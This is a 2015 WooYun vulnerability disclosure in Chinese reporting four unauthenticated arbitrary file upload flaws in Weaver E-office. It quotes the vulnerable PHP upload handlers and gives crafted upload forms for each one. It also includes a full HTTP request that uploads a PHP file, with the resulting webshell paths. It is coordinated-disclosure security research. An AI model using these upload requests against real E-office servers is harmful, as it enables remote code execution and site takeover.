当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0125592

漏洞标题:泛微Eoffice 三处任意文件上传可直接getshell

相关厂商:泛微E-office

漏洞作者: Bear baby

提交时间:2015-07-11 12:10

修复时间:2015-10-11 14:18

公开时间:2015-10-11 14:18

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:17

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-11: 细节已通知厂商并且等待厂商处理中
2015-07-13: 厂商已经确认,细节仅向厂商公开
2015-07-16: 细节向第三方安全合作伙伴开放
2015-09-06: 细节向核心白帽子及相关领域专家公开
2015-09-16: 细节向普通白帽子公开
2015-09-26: 细节向实习白帽子公开
2015-10-11: 细节向公众公开

简要描述:

在实验室奋斗了两天。。来一波

详细说明:

1.文件位置:/webservice/upload.php。相关代码如下:

<?php
include_once( "inc/utility_all.php" );
$pathInfor = pathinfo( $_FILES['file']['tmp_name'] );
$extension = $pathInfor['extension'];
$role = UPLOADROLE;
$attachmentID = createfiledir( );
global $ATTACH_PATH;
$path = $ATTACH_PATH.$attachmentID;
if ( !file_exists( $path ) )
{
mkdir( $path, 448 );
}
$attachmentName = $_FILES['file']['tmp_name'];
$fileName = $path."/".$_FILES['file']['name'];
$fileName = iconv( "UTF-8", "GBK", $fileName );
move_uploaded_file( $_FILES['file']['tmp_name'], $fileName );
if ( !file_exists( $fileName ) )
{
echo "false";
}
else
{ echo $fileName;
echo $attachmentID."*".$_FILES['file']['name'];
}
?>


没有做任何限制直接上传,文件名为原文件名,文件路径如下

$path = $ATTACH_PATH.$attachmentID
$fileName = $path."/".$_FILES['file']['name'];


构造上传表单如下:

<form action="http://网站地址/webservice/upload.php" form enctype="multipart/form-data"  method="POST">
<input name="file" type="file">
<input name="" type="submit">
</form>


如下图,返回内容3023528241*i.php对应路径为/attachment/3023528241/i.php

1.png


2.文件位置:inc/jquery/uploadify/uploadify.php 相关代码如下

<?php
function createFileDir( )
{
global $ATTACH_PATH;
mt_srand( ( double )microtime( ) * 1000000 );
$RADOM_ID = mt_rand( ) + mt_rand( );
if ( !file_exists( $ATTACH_PATH.$RADOM_ID ) )
{
return $RADOM_ID;
}
else
{
createfiledir( );
}
}
if ( !empty( $_FILES ) )
{
$tempFile = $_FILES['Filedata']['tmp_name'];
$attachmentID = createfiledir( );
$uploadPath = $_REQUEST['uploadPath'];
if ( trim( $uploadPath ) == "" )
{
$targetPath = $_SERVER['DOCUMENT_ROOT']."/attachment/".$attachmentID;
}
else
{
$targetPath = $uploadPath."/sent/attachment/".$attachmentID;
}
if ( !file_exists( $targetPath ) )
{
mkdir( $targetPath, 448, true );
}
$targetFile = str_replace( "//", "/", $targetPath )."/".$_FILES['Filedata']['name'];
move_uploaded_file( $tempFile, iconv( "UTF-8", "GBK", $targetFile ) );
echo $attachmentID;
}
?>


也是没有任意过滤,文件名为原文件名,可直接上传shell。

$targetPath = $uploadPath."/sent/attachment/".$attachmentID;
$targetFile = str_replace( "//", "/", $targetPath )."/".$_FILES['Filedata']['name'];


构造上传表单如下:

<form action="http://网站地址/ inc/jquery/uploadify/uploadify.php" form enctype="multipart/form-data"  method="POST">
<input name=" Filedata" type="file">
<input name="" type="submit">
</form>


如下图,返回内容1720699075 对应路径为/attachment/ 1720699075/2.php

2.png


3.文件位置:/general/weibo/javascript/LazyUploadify/uploadify.php
部分相关代码如下:

<?php
….省略部分代码……
include_once( "inc/conn.php" );
if ( !empty( $_FILES ) )
{
$tempFile = $_FILES['Filedata']['tmp_name'];
$fileName = $_FILES['Filedata']['name'];
$thumbWidth = $_REQUEST['thumbWidth'];
$thumbHeight = $_REQUEST['thumbHeight'];
$attachmentID = createfiledir( );
$targetPath = ROOT_PATH."/attachment/".$attachmentID."/";
if ( !file_exists( $targetPath ) )
{
mkdir( $targetPath, 448, true );
}
$targetPath = str_replace( "//", "/", $targetPath );
$targetOriginalFile = $targetPath.$fileName;
$targetOriginalFile = iconv( "UTF-8", "GBK", $targetOriginalFile );
move_uploaded_file( $tempFile, $targetOriginalFile );
$fileExt = strtolower( substr( $fileName, strrpos( $fileName, "." ) ) );
switch ( $fileExt )
{
case ".jpg" :
case ".jpeg" :
case ".png" :
case ".gif" :
$targetThumbPath = ROOT_PATH."/attachment/thumb/".$attachmentID;
if ( !file_exists( $targetThumbPath ) )
{
mkdir( $targetThumbPath, 448, true );
}
$targetThumbFile = $targetThumbPath."/".$fileName;
$targetThumbFile = iconv( "UTF-8", "GBK", $targetThumbFile );
resizeimage( $targetOriginalFile, $targetThumbFile, $thumbWidth, $thumbHeight );
break;
}
$targetThumbFile = iconv( "GB2312", "UTF-8", $targetThumbFile );
$returnValue['thubmPath'] = str_replace( ROOT_PATH, "", $targetThumbFile );
$returnValue['attachmentID'] = $attachmentID;
$returnValue['attachmentName'] = $fileName;
$returnValue['attachmentSize'] = filesize( $targetOriginalFile );
echo json_encode( $returnValue );
}
?>


还是无任何过滤,直接getshell。表单如下:

<form action="http://网站地址/general/weibo/javascript/LazyUploadify/uploadify.php" form enctype="multipart/form-data"  method="POST">
<input name="Filedata" type="file">
<input name="" type="submit">
</form>


如下图返回为json格式。对应路径/attachment/2012291572/2.php

3.jpg


4.文件位置:/general/weibo/javascript/uploadify/uploadify.php
部分代码如下:

include_once( "inc/conn.php" );
include_once( "general/weibo/inc/weibo.inc.php" );
include_once( "general/weibo/inc/thumb_handler.php" );
if ( !empty( $_FILES ) )
{
if ( $_REQUEST['uploadType'] == "log" )
{
$tempFile = $_FILES['Filedata']['tmp_name'];
$fileName = $_FILES['Filedata']['name'];
$targetPath = ROOT_PATH."/attachment/";
$fileExt = substr( $fileName, strrpos( $fileName, "." ) );
$logName = "log".$fileExt;
$targetFile = str_replace( "//", "/", $targetPath )."/".$logName;
move_uploaded_file( $tempFile, iconv( "UTF-8", "GBK", $targetFile ) );
resize( $targetFile, $targetFile, 295, 195 );
$query = "SELECT * FROM unit";
$result = exequery( $connection, $query );
if ( mysql_num_rows( $result ) == 0 )
{
$query = "INSERT INTO unit (LOGO) VALUES ('".$logName."')";
}
else
{
$query = "UPDATE unit SET LOGO = '".$logName."'";
}
if ( exequery( $connection, $query ) )
{
echo $logName;
}
else
{
echo false;
}
}
else
{
$tempFile = $_FILES['Filedata']['tmp_name'];
$fileName = $_FILES['Filedata']['name'];
$userID = $_REQUEST['userID'];
$thumbWidth = $_REQUEST['thumbWidth'];
$thumbHeight = $_REQUEST['thumbHeight'];
$targetPath = ROOT_PATH."/attachment/personal/".$userID;
if ( !file_exists( $targetPath ) )
{
mkdir( $targetPath, 448, true );
}
$fileExt = substr( $fileName, strrpos( $fileName, "." ) );
$targetFile = str_replace( "//", "/", $targetPath )."/".$userID."_temp".$fileExt;
move_uploaded_file( $tempFile, iconv( "UTF-8", "GBK", $targetFile ) );
$windowWidth = $_REQUEST['windowWidth'];
$windowHeight = $_REQUEST['windowHeight'];
resize( $targetFile, $targetFile, $windowWidth - 40, $windowHeight - 100 );
list( $width, $height ) = getimagesize( $targetFile );
echo json_encode( array(
"width" => $width,
"height" => $height,
"imageSrc" => "/".str_replace( ROOT_PATH, "", $targetFile )
) );
}
}
?>


表单可以自行构造。Fiddler请求如下

POST http://172.18.30.133/general/weibo/javascript/uploadify/uploadify.php?uploadType=log HTTP/1.1
Host: 172.18.30.133
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: zou__Session=7f895dd642da7e165f485c5a638224e4; PHPSESSID=9ed7d522a1e2caf3f2fe76082450b3a8
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------94401197120954
Content-Length: 214
-----------------------------94401197120954
Content-Disposition: form-data; name="Filedata"; filename="2.php"
Content-Type: application/x-php
<?php phpinfo();?>
-----------------------------94401197120954--


Shell路径即/attachment/log.php

4.png


带userID则对应路径/attachment/personal/$userID/$userID_temp.php如下图

6.png

漏洞证明:

22.png

在phith0n的案例中随意挑了个测试

11.png


修复方案:

版权声明:转载请注明来源 Bear baby@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2015-07-13 14:17

厂商回复:

CNVD确认所述情况,已经由CNVD通过以往建立的处置渠道向软件生产厂商通报。

最新状态:

暂无


漏洞评价:

评论

  1. 2015-07-09 12:21 | menmen519 ( 普通白帽子 | Rank:762 漏洞数:146 | http://menmen519.blog.sohu.com/)

    哎,这个是小厂商,看样子,文件上传这几个地方被你找到了

  2. 2015-07-09 12:22 | Bear baby ( 普通白帽子 | Rank:183 漏洞数:20 | 善攻者,不知其所守。善守者,不知其所攻。)

    @menmen519 昨天被你发了一波。。你找的那些我应该都有。。亏了

  3. 2015-07-09 12:32 | menmen519 ( 普通白帽子 | Rank:762 漏洞数:146 | http://menmen519.blog.sohu.com/)

    @Bear baby 最新版本的,漏洞比较多,文件上传应该有六处,不过收到2000的感觉不错吧

  4. 2015-07-09 12:37 | Bear baby ( 普通白帽子 | Rank:183 漏洞数:20 | 善攻者,不知其所守。善守者,不知其所攻。)

    @menmen519 木有2000呢

  5. 2015-07-09 12:48 | menmen519 ( 普通白帽子 | Rank:762 漏洞数:146 | http://menmen519.blog.sohu.com/)

    @Bear baby 好吧,打雷那个应该有5000 高产

  6. 2015-07-09 13:08 | 贫道来自河北 ( 普通白帽子 | Rank:1427 漏洞数:426 | 一个立志要把乌云集市变成零食店的男人)

    @Bear baby 是不是1500啊

  7. 2015-07-09 14:11 | 浮萍 ( 普通白帽子 | Rank:555 漏洞数:118 | 默默潜水)

    我了个去 这直接都$$了 我再去扒拉扒拉